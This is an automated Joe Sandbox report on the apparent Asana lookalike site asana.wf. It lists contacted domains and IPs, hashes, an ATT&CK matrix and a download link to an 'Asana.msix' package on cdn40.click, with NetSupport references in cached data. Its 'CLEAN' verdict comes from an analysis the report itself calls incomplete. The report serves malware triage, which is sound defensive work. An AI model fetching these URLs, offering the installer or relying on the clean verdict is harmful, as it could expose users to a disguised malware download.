          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: "D:\\a\\1\\s\\x64\\Release\\PsfRuntime64.pdb source: PsfRuntime64.dll.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfLauncher32.pdb source: PsfLauncher32.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\x64\\Release\\PsfLauncher64.pdb source: PsfLauncher64.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfRunDll32.pdb source: PsfRunDll32.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfRuntime32.pdb source: PsfRuntime32.dll.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\Win32\\Release\\PsfLauncher32.pdb! source: PsfLauncher32.exe.2.dr", source: chromecache_343.1.dr
          Source: Binary string: "D:\\a\\1\\s\\x64\\Release\\PsfRunDll64.pdb source: 7za.exe, 00000002.00000003.1033037111.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, PsfRunDll64.exe.2.dr, PsfRunDll64.exe0.2.dr" source: chromecache_343.1.dr
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: chromecache_343.1.drBinary or memory string: "# BKiMitLJGDL9NaX+nk4vmCIjaQQ2tULiu82AWhbXS7NsVRmPmCQW0LucN/Z0BUZX"
          Source: Yara matchFile source: dropped/chromecache_242, type: DROPPED
          Source: Yara matchFile source: dropped/chromecache_185, type: DROPPED
          Source: Yara matchFile source: dropped/chromecache_301, type: DROPPED
          Source: Yara matchFile source: dropped/chromecache_343, type: DROPPED
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          1
          Masquerading
          1
          Input Capture
          1
          Security Software Discovery
          Remote Services1
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          http://asana.wf0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://r3.o.lencr.org0%Avira URL Cloudsafe
          about:blank0%Avira URL Cloudsafe
          https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb950%Avira URL Cloudsafe
          https://asana.wf/assets/svg/icons.svg0%Avira URL Cloudsafe
          https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.0%Avira URL Cloudsafe
          https://cdn40.click/files/Asana.msix0%Avira URL Cloudsafe
          https://asana.wf/img/HOME24-web-hero-IDC-2x-en-US.webp0%Avira URL Cloudsafe
          https://asana.wf/img/logo-ratio-40pxheight-Dell.svg0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          ghs-svc-https-c46.ghs-ssl.googlehosted.com
          74.125.34.46
          truefalse
            unknown
            asana.wf
            94.131.101.65
            truefalse
              unknown
              cdn40.click
              23.133.88.190
              truefalse
                unknown
                virustotal.com
                216.239.36.21
                truefalse
                  high
                  www.recaptcha.net
                  173.194.219.94
                  truefalse
                    unknown
                    api.ipify.org
                    104.26.12.205
                    truefalse
                      high
                      www.google.com
                      64.233.185.105
                      truefalse
                        high
                        recaptcha.net
                        64.233.176.94
                        truefalse
                          unknown
                          www.virustotal.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://www.virustotal.com/gui/vt-ui-sw-installer.c228b2b19bd8517cfe55.jsfalse
                              high
                              https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95false
                              • Avira URL Cloud: safe
                              unknown
                              https://www.virustotal.com/gui/19739.d25d76e348ff4042df61.jsfalse
                                high
                                https://www.virustotal.com/gui/false
                                  high
                                  about:blankfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://cdn40.click/files/Asana.msixfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urlsfalse
                                    high
                                    https://www.virustotal.com/gui/63334.fa0abcaaac3e415ca2c7.jsfalse
                                      high
                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virustotal.com&oit=3&cp=14&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                        high
                                        https://www.virustotal.com/ui/user_notificationsfalse
                                          high
                                          https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_childrenfalse
                                            high
                                            https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_treesfalse
                                              high
                                              https://www.virustotal.com/gui/stackdriver-errors.b289406877fe6574d5ac.jsfalse
                                                high
                                                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=viru&oit=1&cp=4&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                  high
                                                  https://www.virustotal.com/gui/6829.6c727ee07d052c60889f.jsfalse
                                                    high
                                                    https://www.virustotal.com/gui/36619.68cafafc7df311d6c6b7.jsfalse
                                                      high
                                                      https://www.virustotal.com/gui/86082.7555cf018c5a216147a4.jsfalse
                                                        high
                                                        https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40false
                                                          high
                                                          https://www.virustotal.com/gui/74552.2e8192dc6c15c665f808.jsfalse
                                                            high
                                                            https://www.virustotal.com/gui/87027.b53dee6a7718580c76f9.jsfalse
                                                              high
                                                              https://asana.wf/img/logo-ratio-40pxheight-Dell.svgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://asana.wf/img/HOME24-web-hero-IDC-2x-en-US.webpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.virustotal.com/gui/53486.ad811c674149540522ec.jsfalse
                                                                high
                                                                https://www.virustotal.com/gui/static/opensearch.xmlfalse
                                                                  high
                                                                  https://www.virustotal.com/gui/73581.c40f4c346950a7606c39.jsfalse
                                                                    high
                                                                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virust&oit=1&cp=6&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                      high
                                                                      https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoterfalse
                                                                        high
                                                                        https://www.virustotal.com/gui/34386.8514664b2d3faf72fdd8.jsfalse
                                                                          high
                                                                          https://www.virustotal.com/gui/45518.056c1f55be49c167cf84.jsfalse
                                                                            high
                                                                            https://www.virustotal.com/gui/9234.4895d7a797c4dbf3a58b.jsfalse
                                                                              high
                                                                              https://www.virustotal.com/gui/file/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358?nocache=1false
                                                                                high
                                                                                https://asana.wf/assets/svg/icons.svgfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.virustotal.com/gui/images/favicon.svgfalse
                                                                                  high
                                                                                  https://www.virustotal.com/gui/76491.7dc0284cb3a5a45a07f9.jsfalse
                                                                                    high
                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                    https://rdap.arin.net/registry/entity/KAYAA1-ARINchromecache_170.1.drfalse
                                                                                      high
                                                                                      http://geo.netsupportsoftware.com/location/loca.aspchromecache_343.1.drfalse
                                                                                        high
                                                                                        https://www.virustotal.com/ui/ip_addresses/104.18.20.226chromecache_170.1.drfalse
                                                                                          high
                                                                                          https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/process/README.mdchromecache_209.1.drfalse
                                                                                            high
                                                                                            https://rdap.arin.net/registry/ip/3.0.0.0chromecache_205.1.drfalse
                                                                                              high
                                                                                              https://ampcid.google.com/v1/publisher:getClientIdchromecache_182.1.drfalse
                                                                                                high
                                                                                                https://d30y9cdsu7xlg0.cloudfront.net/png/29715-200.pngchromecache_206.1.drfalse
                                                                                                  high
                                                                                                  https://www.virustotal.com/ui/ip_addresses/239.255.255.250chromecache_205.1.drfalse
                                                                                                    high
                                                                                                    https://registrar.amazon.comchromecache_264.1.drfalse
                                                                                                      high
                                                                                                      https://icann.org/epp#serverDeleteProhibitedchromecache_264.1.drfalse
                                                                                                        high
                                                                                                        https://attack.mitre.org/techniques/T1064/chromecache_349.1.drfalse
                                                                                                          high
                                                                                                          https://support.google.com/recaptcha/#6175971chromecache_267.1.dr, chromecache_308.1.drfalse
                                                                                                            high
                                                                                                            https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.chromecache_267.1.dr, chromecache_308.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/debugger-evasion.md#mechromecache_209.1.drfalse
                                                                                                              high
                                                                                                              http://www.iana.org/assignments/multicast-addresseschromecache_205.1.dr, chromecache_170.1.drfalse
                                                                                                                high
                                                                                                                https://support.google.com/recaptchachromecache_308.1.drfalse
                                                                                                                  high
                                                                                                                  https://www.virustotal.com/gui/search/f76954b68cc390f8009f1a052283a740chromecache_242.1.dr, chromecache_301.1.dr, chromecache_185.1.dr, chromecache_343.1.drfalse
                                                                                                                    high
                                                                                                                    https://www.virustotal.com/go/utm/be91ae163b0b70204e9a73cc5d0590fe87d4c8f6a5b1073b6e4141916d373d8859chromecache_231.1.drfalse
                                                                                                                      high
                                                                                                                      https://rdap.arin.net/registry/entity/RNO29-ARINchromecache_205.1.drfalse
                                                                                                                        high
                                                                                                                        https://rdap.arin.net/registry/entity/APNICchromecache_170.1.drfalse
                                                                                                                          high
                                                                                                                          https://www.snort.org/downloads/#rule-downloadschromecache_242.1.dr, chromecache_301.1.dr, chromecache_185.1.dr, chromecache_343.1.drfalse
                                                                                                                            high
                                                                                                                            https://rdap.arin.net/registry/entity/NOC11962-ARINchromecache_170.1.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/communication/wininet.mdchromecache_209.1.drfalse
                                                                                                                                high
                                                                                                                                https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/README.mdchromecache_209.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://notepad-plus-plus.org/chromecache_343.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/MBCProject/mbc-markdown/blob/main/discovery/README.mdchromecache_209.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://rdap.arin.net/registry/entity/IPROU3-ARINchromecache_205.1.dr, chromecache_170.1.drfalse
                                                                                                                                        high
                                                                                                                                        http://r3.o.lencr.orgchromecache_170.1.dr, chromecache_264.1.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/MBCProject/mbc-markdown/blob/main/persistence/README.mdchromecache_209.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.brighttalk.com/webcast/18282/592177?utm_source=VirusTotal&utm_medium=email&utm_campaign=chromecache_231.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://attack.mitre.org/techniques/T1562/001/chromecache_349.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/markedjs/marked.chromecache_206.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://cloud.google.com/terms/service-termschromecache_206.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://icann.org/epp#clientdeleteprohibitedchromecache_264.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://cloud.google.com/contactchromecache_267.1.dr, chromecache_308.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.youtube.com/embedchromecache_206.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://asana.com/chromecache_343.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://attack.mitre.org/techniques/T1498/))chromecache_209.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.virustotal.com/ui/ip_addresses/224.0.0.251chromecache_170.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://attack.mitre.org/techniques/T1056/chromecache_349.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.virustotal.com/ui/ip_addresses/15.197.167.90chromecache_170.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://icann.org/epp#clienttransferprohibitedchromecache_264.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.virustotal.com/ui/domains/geo.netsupportsoftware.comchromecache_264.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.virustotal.com/ui/files/312bd304860f9865ed4073f5baffde8df9907a1ebfedd2d1d637ab48db3ca004chromecache_336.1.dr, chromecache_242.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.virustotal.com/ui/ip_addresses/3.33.186.135chromecache_205.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://icann.org/epp#serverupdateprohibitedchromecache_264.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://wq.apnic.net/apnic-bin/whois.plchromecache_170.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://attack.mitre.org/techniques/T1033/chromecache_349.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_267.1.dr, chromecache_308.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://icann.org/epp#serverTransferProhibitedchromecache_264.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://github.com/MBCProject/mbc-markdown/blob/main/defense-evasion/hidden-files-and-directories.mdchromecache_209.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.virustotal.com/ui/ip_addresses/172.67.68.212chromecache_170.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://rdap.arin.net/registry/entity/AEA8-ARINchromecache_205.1.dr, chromecache_170.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.spamhaus.org/statistics/tlds/chromecache_242.1.dr, chromecache_301.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_267.1.dr, chromecache_308.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://registrar.amazon.comchromecache_264.1.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.virustotal.com/ui/user_notifications/2023020217chromecache_231.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://attack.mitre.org/techniques/T1059/chromecache_349.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://attack.mitre.org/techniques/T1059)chromecache_209.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://icann.org/epp#serverdeleteprohibitedchromecache_264.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://attack.mitre.org/techniques/T1499/))chromecache_209.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.virustotal.com/ui/ip_addresses/104.18.21.226chromecache_170.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://dialogflow.cloud.google.com/v1/cx/locations/chromecache_206.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.virustotal.com/ui/user_notifications/20230315-use-vt-api-like-a-pro-webinarchromecache_231.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://attack.mitre.org/tactics/TA0004/chromecache_349.1.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.virustotal.com/ui/ip_addresses/23.133.88.190chromecache_170.1.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    173.194.219.94
                                                                                                                                                                                                                    www.recaptcha.netUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    74.125.34.46
                                                                                                                                                                                                                    ghs-svc-https-c46.ghs-ssl.googlehosted.comUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    216.239.36.21
                                                                                                                                                                                                                    virustotal.comUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    104.26.13.205
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    23.133.88.190
                                                                                                                                                                                                                    cdn40.clickReserved
                                                                                                                                                                                                                    394352FASTNET-COMMUNICATIONSCAfalse
                                                                                                                                                                                                                    104.26.12.205
                                                                                                                                                                                                                    api.ipify.orgUnited States
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    94.131.101.65
                                                                                                                                                                                                                    asana.wfUkraine
                                                                                                                                                                                                                    29632NASSIST-ASGIfalse
                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                    64.233.185.105
                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    108.177.122.104
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                    192.168.2.16
                                                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                    Analysis ID:1431861
                                                                                                                                                                                                                    Start date and time:2024-04-25 21:54:27 +02:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 4m 3s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                    Sample URL:http://asana.wf
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:16
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Detection:CLEAN
                                                                                                                                                                                                                    Classification:clean1.win@20/323@34/11
                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 64.233.185.94, 74.125.136.101, 74.125.136.113, 74.125.136.139, 74.125.136.100, 74.125.136.102, 74.125.136.138, 64.233.176.84, 34.104.35.123, 23.40.205.34, 64.233.176.94, 172.253.124.97, 142.250.9.113, 142.250.9.101, 142.250.9.139, 142.250.9.138, 142.250.9.102, 142.250.9.100, 172.253.124.95, 172.217.215.95, 142.251.15.95, 173.194.219.95, 74.125.138.95, 64.233.176.95, 108.177.122.95, 74.125.136.95, 64.233.177.95, 142.250.105.95, 142.250.9.95, 64.233.185.95, 108.177.122.94, 108.177.122.101, 108.177.122.102, 108.177.122.100, 108.177.122.139, 108.177.122.138, 108.177.122.113, 74.125.138.94, 172.253.124.94
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, www.google-analytics.com
                                                                                                                                                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                    • VT rate limit hit for: http://asana.wf
                                                                                                                                                                                                                    No simulations
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 18:54:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2673
                                                                                                                                                                                                                    Entropy (8bit):3.9913862224228076
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:8QdJWTpyOpQHpteidAKZdA1FehwiZUklqehiy+3:8DvSChy
                                                                                                                                                                                                                    MD5:8202283C0391449541E8220EA7E7195B
                                                                                                                                                                                                                    SHA1:E34FCCADB33941DF5E1E93D7DE4F8A195D3BA8E1
                                                                                                                                                                                                                    SHA-256:58AE0DFFA1FCDDE809C677C1D2A90DC314C7CED43731734F976F8BD640AE91EE
                                                                                                                                                                                                                    SHA-512:061531174B92895405988EA851418D192EB7BAD64D951D6536D097817122537ACC8CB316674BF45BF76930BE156BF557902BCD85A4FA24AEA95BFE96B9FF4317
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....t'.qJ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............;s.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 18:54:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2675
                                                                                                                                                                                                                    Entropy (8bit):4.009067158003902
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:8PdJWTpyOpQHpteidAKZdA1seh/iZUkAQkqehRy+2:8GvSc9QAy
                                                                                                                                                                                                                    MD5:1818CA5E11F65F9EAD76043536071B4B
                                                                                                                                                                                                                    SHA1:C4C5176ECC0BC1FF6FAC0BAC1B2143F20C54BA64
                                                                                                                                                                                                                    SHA-256:4F70E5104342F8066B83FEE64F824DD9DC1BED2B4462CB00F1FE7C6FBE1632D3
                                                                                                                                                                                                                    SHA-512:B69F0892DF023DF6BB7F34CA910D0A19C37E93D93E95495558947C7E101E9E45A15BF7BFD2655CF9B82E7F8A4E9B9365B27EC4A41F195FC9D115DDA94B5011CC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
